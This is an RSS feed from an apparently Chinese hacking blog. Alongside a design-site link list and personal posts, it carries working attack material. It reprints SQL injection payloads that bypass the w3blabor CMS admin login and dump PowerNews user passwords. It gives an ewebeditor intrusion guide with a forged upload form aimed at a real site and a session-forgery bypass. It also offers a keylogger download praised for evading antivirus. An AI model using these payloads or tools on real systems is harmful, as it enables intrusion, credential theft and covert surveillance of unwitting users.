<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[黑海洋's BLOG]]></title>
<link>http://www.upx8.com/</link>
<description><![CDATA[-Samael要将生命将尽的Soul带走-]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[tzsm11@163.com(黑海洋)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>黑海洋&#39;s BLOG</title>
	<url>http://www.upx8.com/images/logos.gif</url>
	<link>http://www.upx8.com/</link>
	<description>黑海洋&#39;s BLOG</description>
</image>

			<item>
			<link>http://www.upx8.com/article.asp?id=332</link>
			<title><![CDATA[经典网页设计网站站点大全]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Photo]]></category>
			<pubDate>Sun,04 Jan 2009 15:09:37 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=332</guid>
		<description><![CDATA[一、网页设计类 <br/><br/>蓝色理想 <a href="http://www.blueidea.com" target="_blank">http://www.blueidea.com</a> <br/>网页设计师联盟 <a href="http://www.68design.net" target="_blank">http://www.68design.net</a> <br/>网页设计大本营 <a href="http://www.code-123.com" target="_blank">http://www.code-123.com</a> <br/>我爱设计网 <a href="http://www.52design.com" target="_blank">http://www.52design.com</a> <br/>视觉中国 <a href="http://www.chinavisual.com" target="_blank">http://www.chinavisual.com</a> <br/>设计在线 <a href="http://www.dolcn.com" target="_blank">http://www.dolcn.com</a> <br/>网易学院 <a href="http://tech.163.com/school" target="_blank">http://tech.163.com/school</a> <br/>天极设计在线 <a href="http://art.yesky.com" target="_blank">http://art.yesky.com</a> <br/><br/>二、图象处理类 <br/><br/>设计中国(中国PHOTOSHOP联盟) <a href="http://www.chinaddu.com" target="_blank">http://www.chinaddu.com</a> <br/>图像谷 <a href="http://www.pstxg.com" target="_blank">http://www.pstxg.com</a> <br/><br/>三、动画设计类 <br/><br/>闪客帝国　<a href="http://www.flashempire.com" target="_blank">http://www.flashempire.com</a> <br/>闪吧 <a href="http://www.flash8.net" target="_blank">http://www.flash8.net</a> <br/>闪盟在线 <a href="http://www.flashsun.com" target="_blank">http://www.flashsun.com</a> <br/><br/>四、网页素材类 <br/><br/>桌面城市 <a href="http://www.deskcity.com" target="_blank">http://www.deskcity.com</a> <br/>素材精品屋　<a href="http://www.sucaiw.com" target="_blank">http://www.sucaiw.com</a> <br/>站酷(ZCOOL) <a href="http://www.zcool.com.cn" target="_blank">http://www.zcool.com.cn</a> <br/>E库素材 <a href="http://www.iecool.com" target="_blank">http://www.iecool.com</a> <br/>中国站长素材 <a href="http://sc.chinaz.com" target="_blank">http://sc.chinaz.com</a> <br/><br/>五、程序开发类 <br/><br/>CSDN开发者网络 <a href="http://www.csdn.net" target="_blank">http://www.csdn.net</a> <br/>MSDN 中文网站 <a href="http://msdn.microsoft.com/zh-cn/default.aspx" target="_blank">http://msdn.microsoft.com/zh-cn/default.aspx</a> <br/>动网先锋 <a href="http://www.cndw.com" target="_blank">http://www.cndw.com</a> <br/>编程中国 <a href="http://www.bc-cn.net" target="_blank">http://www.bc-cn.net</a> <br/><br/>六：网站源码类 <br/><br/>代码中国 <a href="http://download.csdn.net" target="_blank">http://download.csdn.net</a> <br/>天新网源码下载 <a href="http://www.21tx.com/src" target="_blank">http://www.21tx.com/src</a> <br/>源码之家 <a href="http://www.mycodes.net" target="_blank">http://www.mycodes.net</a> <br/>站长下载 <a href="http://down.chinaz.com" target="_blank">http://down.chinaz.com</a>]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=331</link>
			<title><![CDATA[1000M免费全能空间【留言申请】]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[News]]></category>
			<pubDate>Sat,03 Jan 2009 20:25:21 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=331</guid>
		<description><![CDATA[<li>功能：<br/><br/>空间容量：1000M<br/><br/>格式：PHP ASP .NET CGI SQL<br/><br/>速度：10M电信独立宽带<br/><br/>-----------------------------<br/><br/> </li><li>申请格式：<br/><br/>需要解析的域名：www.xxx.com<br/><br/>需要设置的ID和密码：发到<span style="color:Red">tzsm11@qq.com</span><br/><br/>-----------------------------<br/><br/>留言先得.</li>]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=330</link>
			<title><![CDATA[w3blabor CMS <= 3.3.0]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Technology]]></category>
			<pubDate>Sat,03 Jan 2009 19:27:45 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=330</guid>
		<description><![CDATA[[!] Discovered.: DNX<br/>[!] Vendor.....: <a href="http://www.w3blaborcms.de" target="_blank">http://www.w3blaborcms.de</a><br/>[!] Detected...: 20.12.2008<br/>[!] Reported...: 20.12.2008<br/>[!] Response...: 21.12.2008<br/><br/>[!] Background.: Sicher! Schnell! Einfach!<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; es zu etwas Besonderem!<br/><br/>[!] Bug........: $_POST[&#39;benutzername&#39;] &amp; $_POST[&#39;passwort&#39;] in admin/index.php near line 93<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;93: if (isset($_GET[&#39;action&#39;]) &amp;&amp; $_GET[&#39;action&#39;] == &#34;login&#34; &amp;&amp; $_POST[&#39;benutzername&#39;] != &#34;&#34; &amp;&amp; $_POST[&#39;passwort&#39;] != &#34;&#34;) {<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;94:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;95:&#160;&#160;&#160;&#160;$check = mysql_fetch_assoc(mysql_query(&#34;Sel&#101;ct * FROM admin Wh&#101;re benutzername=&#39;&#34;.$_POST[&#39;benutzername&#39;].&#34;&#39;&#34;));<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;96:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;97:&#160;&#160;&#160;&#160;if ($check[&#39;benutzername&#39;] == &#34;&#34;) {<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;98:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;99:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$_SESSION[&#39;login&#39;] = false;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 100:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;header(&#34;Location: index.php?fehler=error001&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 101:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;exit;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 102:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 103:&#160;&#160;&#160;&#160;} else {<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 104:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 105:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$md5pw = md5($_POST[&#39;passwort&#39;]);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 106:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 107:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$check = mysql_fetch_assoc(mysql_query(&#34;Sel&#101;ct * FROM admin Wh&#101;re benutzername=&#39;&#34;.$_POST[&#39;benutzername&#39;].&#34;&#39; AND passwort=&#39;&#34;.$md5pw.&#34;&#39;&#34;));<br/><br/>[!] PoC........: To bypass the admin login:<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Username: x&#39; o&#114; 1=1/*<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Password: not empty<br/><br/>[!] Solution...: upgrade to version 3.4.0]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=329</link>
			<title><![CDATA[PowerNews 2.5.4 ]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Technology]]></category>
			<pubDate>Sat,03 Jan 2009 19:22:22 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=329</guid>
		<description><![CDATA[Virangar Security Team<br/>www.virangar.net<br/>--------<br/>Discoverd By :virangar security team(hadihadi)<br/>special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra<br/>&amp; all virangar members &amp; all hackerz<br/>greetz:to my best friend in the world hadi_aryaie2004<br/>&amp; my lovely friend arash(imm02tal)<br/>-------<br/>exploit:<br/><a href="http://site.com/news.php?newsid=" target="_blank">http://site.com/news.php?newsid=</a>&#39;/**/union/**/sel&#101;ct/**/1,2,3,4,concat(nickname,0x3e,password),6,7,8,9/**/from/**/pn_users/*<br/>----<br/>young iranian h4ck3rz]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=328</link>
			<title><![CDATA[Sprinder V1.4a【附-Delphi 源代码】]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Download]]></category>
			<pubDate>Sat,03 Jan 2009 17:05:19 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=328</guid>
		<description><![CDATA[Sprinder V1.2c升级到Sprinder V1.4a，修复了许多BUG，我也搞到了源代码.<br/><br/>好像没什么好介绍的.<br/><br/><img src="http://www.upx8.com/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.upx8.com/attachments/month_0901/Sprinder14.rar" target="_blank">下载此文件</a><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=327</link>
			<title><![CDATA[没资本就不要装逼]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Mood diary]]></category>
			<pubDate>Fri,02 Jan 2009 22:53:46 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=327</guid>
		<description><![CDATA[有些人就他妈的只会80年代的技术（大牛们不要误会,不是狮子他们一代技术可以比拟的），还出来装大虾，我日<br/><br/>有些人他妈的说什么RT,UB，只要你说的他都懂，你说他不懂，他还来劲了跟你挣，悲哀啊.<br/><br/>不知道就要虚心求教，少他妈的装。<br/><br/>真TMD不想拆穿他，哎，只好配合他.（谁叫咱人好呢）<br/><br/>像我溢出技术理论不懂，我就他妈敢承认，虚心求教百度。<br/><br/>下次要是再他妈的让我碰到，直接枪毙.]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=326</link>
			<title><![CDATA[银泰人如潮水]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Mood diary]]></category>
			<pubDate>Thu,01 Jan 2009 22:26:34 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=326</guid>
		<description><![CDATA[楔子：银泰的人太多了只能用潮(别的词汇一律作废),银泰打折也不至于这样吧,搞的里面的东西白拿似的(美女们容许我问一下,是不是免费的啊),害我进去久想出来都难.<br/><br/>今天就冲这银泰打折去的，<br/>打折如下：<br/><span style="color:Red"><br/>400减160<br/>400减260<br/>500减330<br/>1000减660<br/></span><br/><br/>我和室友进去之后，看到的那是400减260 500减330 1000减660 啊,除了垃圾牌子（都没听过,可能我农民吧），其他的都是400减160.<br/><br/>逛着逛着久失去了兴趣，索性出去到外面看看，等下楼的时<span style="color:Red">咋一看</span>（晕.都是人），进来时可能没注意。<br/><br/>又是一次没实际性的打折......]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=325</link>
			<title><![CDATA[Spytector 1.3.7【键盘记录】]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Download]]></category>
			<pubDate>Thu,01 Jan 2009 21:25:51 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=325</guid>
		<description><![CDATA[虽然说是沉淀货，但是不得不说它的功能之强大，<br/><br/>易与做免杀（<span style="color:Red">至少你现在用Spytector 1.3.7生成一个Server.exe，不用做免杀它也过瑞星</span>）。<br/><br/>这款工具总体说不错，支持EMAIL，FTP等收信方式，内置下载者等功能.<br/>Spytector监控你电脑上的所有动作，它具备一套过滤器和高级防火墙技术，能够监测包括e-mail、FTP、剪贴版等等，并记录下来。所以，它能够发现某些无法预知的间谍软件(后门程序和蠕虫木马等)活动而导致的不良后果。<br/>Spytector不会因为记录系统信息而使你的隐私暴露，相反，它还会对这些记录信息进行加密存储。一般的用户从任务管理器无法发现它的行踪，并且占用资源仅有30kb，适用于内存小、CPU慢的低配置用户。(SINA)<br/><br/><a href="http://www.upx8.com/attachments/month_0901/7200911212459.jpg" rel="lightbox[upx8]" title="powered by upx8"><img src="http://www.upx8.com/attachments/month_0901/7200911212459.jpg" border="0" alt=""/></a><br/><br/>官方：<a href="http://www.spytector.com" target="_blank">http://www.spytector.com</a><br/><br/><img src="http://www.upx8.com/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.upx8.com/attachments/month_0901/Spytector137.rar" target="_blank">下载此文件</a><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=323</link>
			<title><![CDATA[boardspy v.0.1+源代码【VB】]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Download]]></category>
			<pubDate>Thu,01 Jan 2009 20:50:12 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=323</guid>
		<description><![CDATA[该软件仍在测试中.....<br/><br/><div class="UBBPanel"><div class="UBBTitle"><img src="http://www.upx8.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">用法:<br/>boardspy.exe &lt;setting1&gt; &lt;setting2&gt; &lt;setting3&gt;...<br/><br/>设置:<br/> -url &lt;target url (ROOT Directory of Board!)&gt;<br/><br/>例如:<br/>boardspy.exe -url &#34;<a href="http://bbs.upx8.com/" target="_blank">http://bbs.upx8.com/</a>&#34;</div></div><br/><br/><span style="color:Red">例如：</span><br/><br/><div class="UBBPanel"><div class="UBBTitle"><img src="http://www.upx8.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">P:\boardspy&gt;boardspy.exe -url &#34;<a href="http://bbs.upx8.com/" target="_blank">http://bbs.upx8.com/</a>&#34;<br/><br/>[+] Checking...&nbsp;&nbsp;&nbsp;&nbsp; //检测<br/>[+] Done, needed 2 secs&nbsp;&nbsp;&nbsp;&nbsp; //完成时限<br/><br/>[+] Success: vBulletin 3.7.2&nbsp;&nbsp;&nbsp;&nbsp; //成功</div></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/><br/><img src="http://www.upx8.com/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.upx8.com/attachments/month_0901/j200911205557.rar" target="_blank">点击下载此文件</a><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.upx8.com/article.asp?id=319</link>
			<title><![CDATA[浅析Webedit在线编辑器的入侵]]></title>
			<author>tzsm11@163.com(admin)</author>
			<category><![CDATA[Technology]]></category>
			<pubDate>Thu,01 Jan 2009 19:09:43 +0800</pubDate>
			<guid>http://www.upx8.com/default.asp?id=319</guid>
		<description><![CDATA[ewebeditor编辑器可一般默认数据库路径是db/ewebeditor.mdb<br/>默认的后台路径是admin/admin_login.asp<br/>有的时候管理员修改为asp、asa，可以插入一句话<br/>有的时候爆了数据库找不到后台地址让人发急，其实可以试试查看样式表，有没别人加入的后缀样式表，直接利用上传，具体看完文章我想大家都有个全新的认识了<br/>还有的时候聪明的管理员也就是加“#”不妨社工试试，我可没少占便宜的<br/>例如:db/#ewebeditor.asa、db/#ewebeditor.asp<br/>有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞<br/>简单利用就是<br/><a href="http://site/path/ewebeditor/ewebeditor.asp?id=article_content" target="_blank">http://site/path/ewebeditor/ewebeditor.asp?id=article_content</a>&amp;style=full_v200<br/><a href="http://www.siqinci.com/ewebedito" target="_blank">http://www.siqinci.com/ewebedito</a> ... amp;style=full_v200<br/>可以利用nbsi进行猜解，对此进行注入<br/>还有的时候管理员不让复制样式，但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell，但是上传插入工具没有，又无法修改怎么办那？也许很多人说应该可以加工具栏，但是我就遇见过不让加的<br/>这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下：<br/><br/><br/><br/>&lt;script language=javascript&gt;parent.UploadError(&#39;无效的样式ID号，请通过页面上的链接进行操作！&#39;);history.back()&lt;/script&gt;<br/>&lt;HTML&gt;<br/>&lt;HEAD&gt;<br/>&lt;TITLE&gt;文件上传&lt;/TITLE&gt;<br/>&lt;meta http-equiv=&#34;Content-Type&#34; content=&#34;text/html; charset=gb2312&#34;&gt;<br/>&lt;style type=&#34;text/css&#34;&gt;<br/>body, a, table, div, span, td, th, input, sel&#101;ct{font:9pt;font-family: &#34;宋体&#34;, Verdana, Arial, Helvetica, sans-serif;}<br/>body {padding:0px;margin:0px}<br/>&lt;/style&gt;<br/>&lt;script language=&#34;JavaScript&#34; src=&#34;dialog/dialog.js&#34;&gt;&lt;/script&gt;<br/>&lt;/head&gt;<br/>&lt;body bgcolor=menu&gt;<br/>&lt;form <a href="http://www.golden-victory.com/ew" target="_blank">http://www.golden-victory.com/ew</a> ... &amp;style=s_poppop&#34;&gt;<a href="http://www.golden-victory.com/ewebeditor/upload.asp?action=save" target="_blank">http://www.golden-victory.com/ewebeditor/upload.asp?action=save</a>&amp;type=image&amp;style=s_poppop&#34; method=post name=myform enctype=&#34;multipart/form-data&#34;&gt;<br/>&lt;input type=file name=uploadfile size=1 style=&#34;width:100%&#34;&gt;<br/>&lt;input type=submit name=uploadfile value=上传&gt;&lt;/input&gt;<br/>&lt;/form&gt;<br/>&lt;script language=javascript&gt;<br/>var sAllowExt = &#34;&#34;;<br/>// 检测上传表单<br/>function CheckUploadForm() {<br/>if (!IsExt(document.myform.uploadfile.value,sAllowExt)){<br/>&nbsp;&nbsp;parent.UploadError(&#34;提示：\n\n请选择一个有效的文件，\n支持的格式有（&#34;+sAllowExt+&#34;）！&#34;);<br/>&nbsp;&nbsp;return false;<br/>}<br/>return true<br/>}<br/>// 提交事件加入检测表单<br/>var oForm = document.myform ;<br/>oForm.attachEvent(&#34;onsubmit&#34;, CheckUploadForm) ;<br/>if (! oForm.submitUpload) oForm.submitUpload = new Array() ;<br/>oForm.submitUpload[oForm.submitUpload.length] = CheckUploadForm ;<br/>if (! oForm.originalSubmit) {<br/>oForm.originalSubmit = oForm.submit ;<br/>oForm.submit = function() {<br/>&nbsp;&nbsp;if (this.submitUpload) {<br/>&nbsp;&nbsp;for (var i = 0 ; i &lt; this.submitUpload.length ; i++) {<br/>&nbsp;&nbsp;&nbsp;&nbsp;this.submitUpload() ;<br/>&nbsp;&nbsp;}<br/>&nbsp;&nbsp;}<br/>&nbsp;&nbsp;this.originalSubmit() ;<br/>}<br/>}<br/>// 上传表单已装入完成<br/>try {<br/>parent.UploadLoaded();<br/>}<br/>catch(e){<br/>}<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>还有种方式是最近坏客发现的<br/>利用WebEditor session欺骗漏洞,进入后台:<br/>漏洞文件:Admin_Private.asp<br/>漏洞语句:&lt;%<br/><br/>If Session(&#34;eWebEditor_User&#34;) = &#34;&#34; Then<br/>Response.Redirect &#34;admin_login.asp&#34;<br/>Response.End<br/>End If<br/><br/>只判断了session，没有判断cookies和路径的验证问题。<br/>漏洞利用:<br/>新建一个amxking.asp内容如下:<br/>&lt;%Session(&#34;eWebEditor_User&#34;) = &#34;11111111&#34;%&gt;<br/>访问amxking.asp，再访问后台任何文件，for example:Admin_Default.asp ]]></description>
		</item>
		
</channel>
</rss>
